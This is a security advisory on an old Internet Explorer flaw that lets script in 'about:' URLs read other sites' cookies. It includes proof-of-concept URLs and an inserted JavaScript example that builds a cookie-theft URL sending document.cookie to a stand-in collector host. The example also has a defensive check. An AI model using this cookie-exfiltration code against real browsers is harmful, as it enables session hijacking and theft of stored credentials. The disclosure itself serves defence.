As we reported in our previous article, Cookie Data in IE Can Be Exposed or Altered Through Script Injection, a security vulnerability has been uncovered in the way Internet Explorer handles JavaScript inside "about:" URLs. The vulnerability gives an attacker access to the web user's stored cookies.
Credit:
The information has been provided by Jouko Pynnonen.
Microsoft Internet Explorer has a vulnerability that allows a malicious website to access any cookie in the browser's memory or those stored on disk. Cookies are used by web sites for storing preferences, statistics and tracking users, but also for storing more sensitive information such as session keys and even usernames and passwords. Cookies are used by many (probably most) online banks, web mail systems, and other sites requiring user authentication.
Access to cookies may allow an attacker to retrieve passwords or other sensitive information, or hijack authenticated web sessions.
What makes this possible are certain features of IE's "about:" URL handling. A URL starting with "about:" can contain HTML code that the browser will interpret. For instance, entering the URL "about:<h1>hello</h1>" brings up a page with the heading "hello". The URL may contain JavaScript as well. Going to the following location with IE causes an alert box to be displayed:
about:<script language=JavaScript>alert('ALERT');</script>
Finally, the about URL may have a hostname placed after the colon, and IE uses that hostname when determining the cookies to use:
about://www.anydomain.fi/<script language=JavaScript>alert(document.cookie);</script>
The above URL would result in IE displaying cookies of www.anydomain.fi in the alert box, assuming that the site has been visited and it has set a cookie that has not expired.
A malicious website can have a piece of JavaScript redirecting the browser to an about: URL similar to the one above, and do anything with the cookie information of any selected domain. Instead of showing an alert box, the JavaScript code might just pass the cookie contents to a script or a CGI program which could quietly store the information to a file and then redirect the browser elsewhere or show some seemingly harmless web content.
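The attack the preceding paragraphs describe, written out as an added example (this is not code from the advisory or from its author). It assembles the about: URL in the form shown above, but with the injected script handing document.cookie to a collector instead of displaying it, and adds a small defensive check. The names targetHost, collectorUrl and the collector address used in the comments are assumptions for illustration:

```javascript
// Added example, not part of the original advisory.
// Builds the about: URL an attacking page would navigate to. Per the
// advisory, IE 5.5/6 attributed the cookies of the hostname after
// "about://" to the script embedded in the URL.
function buildCookieTheftUrl(targetHost, collectorUrl) {
  // Injected script: instead of alert(document.cookie), send the cookie
  // string to the collector (the "script or CGI program" the advisory
  // mentions) via a redirect. The collector can then show harmless content.
  const payload =
    "<script language=JavaScript>" +
    "location.replace('" + collectorUrl + "?c='+escape(document.cookie));" +
    "</script>";
  return "about://" + targetHost + "/" + payload;
}

// The host IE used for cookie lookup: the text between "about://" and the
// next "/" (or the start of injected markup). Returns null for about: URLs
// without a host, such as about:blank.
function aboutUrlHost(url) {
  const m = /^about:\/\/([^\/<]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Defensive check (an assumption of this example, not a workaround from the
// advisory): a proxy or a page could reject about: URLs that carry markup,
// since legitimate ones such as about:blank never contain "<" or ">".
function isSuspiciousAboutUrl(url) {
  return /^about:/i.test(url) && /[<>]/.test(url);
}

// What the malicious page would do in IE 5.5/6; the address is hypothetical.
// Left commented so the module can be loaded and examined outside a browser.
if (typeof window !== "undefined") {
  // window.location.href = buildCookieTheftUrl("www.anydomain.fi",
  //   "http://attacker.example/collect.cgi");
}
```

The built URL differs from the advisory's alert() version only in what the injected script does with document.cookie; the cookie-domain confusion comes entirely from the hostname IE reads after "about://".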
A web page for testing the vulnerability can be found at
http://www.solutions.fi/iebug/
You can type in an address of a website that uses cookies, (without "http://") and it will tell you if your browser is vulnerable to the problem. For a relatively harmless test case try typing the address www.google.com in the box, assuming you have visited Google before.
At least IE versions 6 and 5.50 appear to be vulnerable, but some older versions, such as 5.00, do not appear to be, at least not in the way described above: version 5.00 interprets the HTML and JavaScript, but document.cookie contains no cookie data.
A vulnerability with the same impact came public in May 2000, see: http://www.peacefire.org/security/iecookies/.
Workaround:
You can protect yourself from the vulnerability by disabling cookies (at Tools -> Internet options -> Security -> Customize) or by switching to another browser such as Opera or Netscape, which do not appear to have the same about: URL features.
Solution:
See our previous article:
Cookie Data in IE Can Be Exposed or Altered Through Script Injection